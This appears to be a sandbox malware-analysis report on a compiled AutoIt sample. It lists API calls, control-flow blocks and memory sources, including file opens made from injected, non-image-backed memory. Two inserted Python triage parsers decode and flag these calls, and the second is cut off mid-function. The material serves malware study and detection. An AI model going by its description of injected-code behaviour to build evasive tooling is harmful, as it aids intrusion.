                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010B8BC5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                  • Instruction ID: 9ca7f1de1e0743884db4df8940bd233e469bd76b1a6aae5a0ae89c72504323b3
                                                                                                                  • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                  • Instruction Fuzzy Hash: A0510875A10208FBEF60DFB4CC89FDE77B8AF48701F108955F64AEA180DA7496458B64

                                                                                                                   Control-flow Graph (recovered from the graph data; the rendered figure, including its executed / not executed colouring, is not available)
                                                                                                                   • Entry block de49fb-de4a25: call debcce, RegOpenKeyExW; one branch ends at de4a2b-de4a2f, the other continues at e541cc-e541e3 (first RegQueryValueExW, called with a NULL data buffer to obtain the size)
                                                                                                                   • From e541cc either straight to e54246-e5424f (RegCloseKey) or through e541e5-e54222 (call dff4ea, call de47b7, second RegQueryValueExW) → optionally e54224-e5423b (call de6a63) → e5423d-e54245 (call de47e2) → e54246-e5424f (RegCloseKey)
                                                                                                                   • The entry block lies at de49fb while the remaining blocks of the same function lie at e541cc-e5424f within the same image
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00DE4A1D
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E541DB
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E5421A
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00E54249
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                  • API String ID: 1586453840-614718249
                                                                                                                  • Opcode ID: 2d28ceed20e98b4c92bb1bf544fee07bcbef76aa50433adc771c99bb86fcfa10
                                                                                                                  • Instruction ID: c3aa48695f688fe0b6ff7037da4bd6937648184821c84e82c8e82d818a1b0628
                                                                                                                  • Opcode Fuzzy Hash: 2d28ceed20e98b4c92bb1bf544fee07bcbef76aa50433adc771c99bb86fcfa10
                                                                                                                  • Instruction Fuzzy Hash: E4117F71A04208BFEB00ABA5DD86DBF7BBCEF04358F005069F506E2191EA70AE45DB60
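The two listings above (the routine at 010b8b80, whose dump source shows it running from memory that is not backed by a PE image, and the AutoIt runtime's lookup of the Include value under Software\AutoIt v3\AutoIt) are easier to read once the raw DWORD arguments are resolved to their Win32 names. The following Python is an added example, not code from Joe Sandbox or from the sample: it parses lines in the format used by this report, decodes the CreateFileW and RegOpenKeyExW arguments with the documented Win32 constants, and flags file, registry and memory APIs that are called from a dump region marked "based on PE: false". The sample input is copied from the two listings above; the regexes, the FunctionReport structure and the IO_APIS list are this example's own choices, not part of the report format.

```python
import re
from dataclasses import dataclass, field

# Added example, not part of the Joe Sandbox report or of the sample: a decoder
# for the "APIs" and "Memory Dump Source" lines of a function listing. It
# resolves the hex arguments of CreateFileW and RegOpenKeyExW to their
# documented Win32 names and flags calls made from memory that is not backed
# by a PE image, which is the first thing to look at when triaging injected code.

# One "APIs" entry: "CreateFileW.KERNELBASE(?,80000000,...), ref: 010B8BC5"
# or, for CRT helpers, "_wcscat.LIBCMT ref: 00E52D80" (no argument list).
API_LINE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\),?)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
SUBCALL = re.compile(r"^Part of subcall function (?P<func>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
SOURCE_LINE = re.compile(
    r"Source File:\s*(?P<dump>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)"
)

# Documented Win32 constants (winnt.h / winreg.h / fileapi.h).
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = {0x01: "FILE_ATTRIBUTE_READONLY", 0x02: "FILE_ATTRIBUTE_HIDDEN",
             0x04: "FILE_ATTRIBUTE_SYSTEM", 0x80: "FILE_ATTRIBUTE_NORMAL",
             0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_ACCESS = {0x0001: "KEY_QUERY_VALUE", 0x0002: "KEY_SET_VALUE", 0x0004: "KEY_CREATE_SUB_KEY",
              0x0008: "KEY_ENUMERATE_SUB_KEYS", 0x0010: "KEY_NOTIFY", 0x0020: "KEY_CREATE_LINK",
              0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY"}

# APIs worth flagging when they originate from unbacked memory (this example's own list).
IO_APIS = {"CreateFileW", "ReadFile", "WriteFile", "CopyFileW", "DeleteFileW",
           "VirtualAlloc", "RegOpenKeyExW"}


def flags(value, table):
    """Render a bit mask with the names in table; bits without a name stay as hex."""
    names, known = [], 0
    for bit, name in table.items():
        if (value & bit) == bit:
            names.append(name)
            known |= bit
    if value & ~known:
        names.append(hex(value & ~known))
    return "|".join(names) if names else "0"


def parse_arg(raw):
    """'?' means the sandbox could not resolve the argument; 8 hex digits are a DWORD; the rest are strings."""
    raw = raw.strip()
    if raw == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", raw):
        return int(raw, 16)
    return raw


def decode(api, args):
    """Describe the arguments of the APIs this triage cares about (empty dict otherwise)."""
    def named(v, table):
        return "?" if v is None else flags(v, table)
    if api == "CreateFileW" and len(args) >= 6:  # (name, access, share, sa, disposition, attrs, template)
        return {"access": named(args[1], GENERIC_ACCESS),
                "share": named(args[2], SHARE_MODE),
                "disposition": "?" if args[4] is None else DISPOSITION.get(args[4], hex(args[4])),
                "attributes": named(args[5], FILE_ATTR)}
    if api == "RegOpenKeyExW" and len(args) >= 4:  # (hKey, subkey, options, samDesired, result)
        root = args[0]
        return {"root": "?" if root is None else HKEY.get(root, hex(root)),
                "subkey": args[1],
                "access": named(args[3], KEY_ACCESS)}
    return {}


@dataclass
class FunctionReport:
    dump: str = ""
    pe_backed: bool = True
    calls: list = field(default_factory=list)


def parse_function(text):
    """Parse one function block: its APIs list plus its Memory Dump Source line."""
    report = FunctionReport()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        via = None
        sub = SUBCALL.match(line)
        if sub:  # call reached through a callee, keep it but remember where from
            via, line = sub.group("func"), sub.group("rest")
        m = API_LINE.match(line)
        if m:
            arg_text = m.group("args")
            args = [parse_arg(a) for a in arg_text.split(",")] if arg_text is not None else []
            report.calls.append({"api": m.group("api"), "module": m.group("module"),
                                 "ref": m.group("ref"), "via_subcall": via,
                                 "args": args, "decoded": decode(m.group("api"), args)})
            continue
        s = SOURCE_LINE.search(line)
        if s:
            report.dump, report.pe_backed = s.group("dump"), s.group("pe") == "true"
    return report


def triage(report):
    """Flag file/registry/memory APIs called from code with no backing PE image."""
    if report.pe_backed:
        return []
    return [f"{c['api']} at {c['ref']} from unbacked region {report.dump}"
            for c in report.calls if c["api"] in IO_APIS]


# Sample input copied from the two function listings in the report above.
SHELLCODE_BLOCK = r"""
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010B8BC5
• Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
"""
REGISTRY_BLOCK = r"""
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00DE4A1D
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E541DB
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E5421A
• RegCloseKey.ADVAPI32(?), ref: 00E54249
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
"""

if __name__ == "__main__":
    for block in (SHELLCODE_BLOCK, REGISTRY_BLOCK):
        rep = parse_function(block)
        for c in rep.calls:
            print(c["api"], c["ref"], c["decoded"])
        print(triage(rep) or "no unbacked-memory findings")
```

Run as a script it prints the decoded calls. For the 010b8b80 block it resolves CreateFileW(?, 80000000, 00000001, 00000000, 00000003, 00000080, 00000000) to GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, that is a read-only open of an existing file issued from injected code, and reports it because the dump source is not PE-backed; the AutoIt registry lookup decodes to HKEY_CURRENT_USER, Software\AutoIt v3\AutoIt, KEY_QUERY_VALUE and is not flagged because it comes from the mapped image.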

                                                                                                                   Control-flow Graph (recovered from the graph data; the rendered figure, including its executed / not executed colouring, is not available)
                                                                                                                   • Single basic block de36b8-de3728: CreateWindowExW * 2, ShowWindow * 2
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DE36E6
                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DE3707
                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00DE3AA3,?), ref: 00DE371B
                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00DE3AA3,?), ref: 00DE3724
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CreateShow
                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                  • Opcode ID: 836b948aaca9506267d83a62d744559a4f5833ab6b35924d623e5479c4c31bd0
                                                                                                                  • Instruction ID: 74b414d20fe282842d43a086f7df9c9f1e8585317bca2a9a73507de2b1132e34
                                                                                                                  • Opcode Fuzzy Hash: 836b948aaca9506267d83a62d744559a4f5833ab6b35924d623e5479c4c31bd0
                                                                                                                  • Instruction Fuzzy Hash: 67F0DA71A482E47EE7315757AC89E673E7DE7CBF60F00405FFA08B21A0C5612899DAB1

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00EA1148,?,00DE61FF,?,00000000,00000001,00000000), ref: 00DE5392
                                                                                                                    • Part of subcall function 00DE49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00DE4A1D
                                                                                                                  • _wcscat.LIBCMT ref: 00E52D80
                                                                                                                  • _wcscat.LIBCMT ref: 00E52DB5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat$FileModuleNameOpen
                                                                                                                  • String ID: 8!$\$\Include\
                                                                                                                  • API String ID: 3592542968-2226600046
                                                                                                                  • Opcode ID: a66a028ad0d1812d584d566f7ce3646a4fe920d7d9bdf2b9ff829c768328f810
                                                                                                                  • Instruction ID: 4242c9452ef9acd6b3eea70a51dedc6cbb9207d25923314d951b79ef253943a2
                                                                                                                  • Opcode Fuzzy Hash: a66a028ad0d1812d584d566f7ce3646a4fe920d7d9bdf2b9ff829c768328f810
                                                                                                                  • Instruction Fuzzy Hash: 85514F714093809FC714EF5AD88189AB3F4FFAE300B40592EF749B7261EB30A948CB61

                                                                                                                   Control-flow Graph
                                                                                                                   • Block 1507 (de51af-de51c5) -> 1508, 1509
                                                                                                                   • Block 1508 (de51cb-de51e0): call de6b0f -> 1512, 1513
                                                                                                                   • Block 1509 (de52a2-de52a6): no successors
                                                                                                                   • Block 1512 (e53ca1-e53cb0): LoadStringW -> 1516
                                                                                                                   • Block 1513 (de51e6-de5206): call de6a63 -> 1516, 1517
                                                                                                                   • Block 1516 (e53cbb-e53cd3): call de510d, call de4db1 -> 1526, 1528
                                                                                                                   • Block 1517 (de520c-de5210) -> 1519, 1520
                                                                                                                   • Block 1519 (de5216-de521b): call de510d -> 1526
                                                                                                                   • Block 1520 (de52a7-de52b0): call de6eed -> 1526
                                                                                                                   • Block 1526 (de5220-de529d): call e00d50, call de50e6, call e00d23, Shell_NotifyIconW, call decb37 -> 1509
                                                                                                                   • Block 1528 (e53cd9-e53cf7): call de518c, call de4db1, call de518c -> 1526
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DE522F
                                                                                                                  • _wcscpy.LIBCMT ref: 00DE5283
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DE5293
                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E53CB0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                                  • String ID: Line:
                                                                                                                  • API String ID: 1053898822-1585850449
                                                                                                                  • Opcode ID: 168c842f7a123eb107c631110b06807e47ce081adcea9d479cf2c30b0c8898a7
                                                                                                                  • Instruction ID: ceb6a654968149d8533bd8079de40fc30f0effaa1457571fafdf6b508801a595
                                                                                                                  • Opcode Fuzzy Hash: 168c842f7a123eb107c631110b06807e47ce081adcea9d479cf2c30b0c8898a7
                                                                                                                  • Instruction Fuzzy Hash: 8531B271408780AFC320FB61EC42FDF77D8EB55394F00451AF685A6091EB70A64C8BB6
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00DE39FE,?,00000001), ref: 00DE41DB
                                                                                                                  • _free.LIBCMT ref: 00E536B7
                                                                                                                  • _free.LIBCMT ref: 00E536FE
                                                                                                                    • Part of subcall function 00DEC833: __wsplitpath.LIBCMT ref: 00DEC93E
                                                                                                                    • Part of subcall function 00DEC833: _wcscpy.LIBCMT ref: 00DEC953
                                                                                                                    • Part of subcall function 00DEC833: _wcscat.LIBCMT ref: 00DEC968
                                                                                                                    • Part of subcall function 00DEC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00DEC978
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                  • API String ID: 805182592-1757145024
                                                                                                                  • Opcode ID: bd208e841741c0d278db049de6da4af69bfd2295d11dd1277bf592014ecc651c
                                                                                                                  • Instruction ID: 7e5f082034b82dab462bf53b5858c9af57ca0fc8d27aa5694a2b7bdde3ab3904
                                                                                                                  • Opcode Fuzzy Hash: bd208e841741c0d278db049de6da4af69bfd2295d11dd1277bf592014ecc651c
                                                                                                                  • Instruction Fuzzy Hash: B0918F71910259AFCF04EFA5DC919EEB7B4FF08354F10542AF916BB291DB70AA09CB60
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 010BA530: Sleep.KERNELBASE(000001F4), ref: 010BA541
                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010BA774
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFileSleep
                                                                                                                  • String ID: H4A5I75ES5LYUTDEFQOX5VL
                                                                                                                  • API String ID: 2694422964-3224610191
                                                                                                                  • Opcode ID: db3f202ca826135bfb363efd46ce77f7761a39ea5f1d536ef905c1bc753c62fb
                                                                                                                  • Instruction ID: fdbb2e51a99262bc8f080ee35da220fa4c1e938a0799d72ea8ad0fc976bddab2
                                                                                                                  • Opcode Fuzzy Hash: db3f202ca826135bfb363efd46ce77f7761a39ea5f1d536ef905c1bc753c62fb
                                                                                                                  • Instruction Fuzzy Hash: 39618230E04288DBEF11DBB4C854BEEBBB9AF15304F044199E6497B2C1DBB91B45CBA5
                                                                                                                  APIs
                                                                                                                  • __getstream.LIBCMT ref: 00E034FE
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E03539
                                                                                                                  • __wopenfile.LIBCMT ref: 00E03549
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                  • String ID: <G
                                                                                                                  • API String ID: 1820251861-2138716496
                                                                                                                  • Opcode ID: f411b58cd6555278b7eaaa0120c65233ddeebf7d0facf54209ea8bde7fddb690
                                                                                                                  • Instruction ID: 413376a3130db5a1e28635b36fa57e6e4a9f8b163f925ef38e00beb6aadacb4a
                                                                                                                  • Opcode Fuzzy Hash: f411b58cd6555278b7eaaa0120c65233ddeebf7d0facf54209ea8bde7fddb690
                                                                                                                  • Instruction Fuzzy Hash: 02110A70E003069BDB61BFB18C4266E77E8AF05354B14A825E425FB2D1EB30CAD197A1
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DFD28B,SwapMouseButtons,00000004,?), ref: 00DFD2BC
                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00DFD28B,SwapMouseButtons,00000004,?,?,?,?,00DFC865), ref: 00DFD2DD
                                                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,00DFD28B,SwapMouseButtons,00000004,?,?,?,?,00DFC865), ref: 00DFD2FF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                  • Opcode ID: b35431b7daeb5fc71a01652c507de779f2539d22bc9bf531a67e22a5e20e7a25
                                                                                                                  • Instruction ID: 62118859eea14e161e257209745bbf5713f4ee2d20cfd9a41892055ad828fd9c
                                                                                                                  • Opcode Fuzzy Hash: b35431b7daeb5fc71a01652c507de779f2539d22bc9bf531a67e22a5e20e7a25
                                                                                                                  • Instruction Fuzzy Hash: FD115A75A1520CBFDB118F69DC84EBF7BFAEF05744B058429EA01E7120D671DE449B60
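The "APIs" entries in this report are the Joe Sandbox IDA plugin's per-function listing of Win32 and CRT call sites: "<name>.<module>(<resolved args>), ref: <call address>", with "Part of subcall function" marking calls reached through a callee. The following Python parser is an added example, not part of the report or of Joe Sandbox's tooling. It turns those lines into records and pulls out the registry keys a function opens, which is the kind of triage a practitioner does before writing a rule. The sample input is constructed from entries in this section. Note that the two keys it recovers here, HKCU\Software\AutoIt v3\AutoIt (the "\Include\" string in the same function points to the interpreter's include-path lookup) and HKCU\Control Panel\Mouse\SwapMouseButtons, are consistent with the AutoIt runtime's own behaviour rather than with the embedded script, so a detection keyed on them alone would also match benign compiled AutoIt binaries. The hive table and the module-count helper are assumptions of this example, not output of the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Registry hive constants as they appear (hex, no 0x) in the plugin's argument lists.
# Assumed mapping for this example; the report itself prints only the raw constant.
HIVES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU"}

# One "APIs" entry: optional "Part of subcall function <addr>:" prefix, then
# <name>.<module>, an optional parenthesised argument list, and "ref: <addr>".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiRef:
    name: str                # e.g. RegOpenKeyExW, _wcscat
    module: str              # e.g. KERNELBASE, LIBCMT
    args: Tuple[str, ...]    # resolved arguments; "?" where the plugin could not resolve one
    ref: int                 # address of the call site
    caller: Optional[str]    # subcall function address for "Part of subcall function" entries


def parse_api_lines(text: str) -> List[ApiRef]:
    """Extract ApiRef records from report text; headings and non-API lines are skipped."""
    refs: List[ApiRef] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m["args"]
        args = tuple(a.strip() for a in raw_args.split(",")) if raw_args is not None else ()
        refs.append(ApiRef(m["name"], m["module"], args, int(m["ref"], 16), m["caller"]))
    return refs


def registry_keys(refs: List[ApiRef]) -> List[Tuple[str, str]]:
    """(hive, subkey) pairs for RegOpenKeyExW/RegCreateKeyExW calls whose hive
    constant and subkey string were both resolved by the plugin."""
    keys = set()
    for r in refs:
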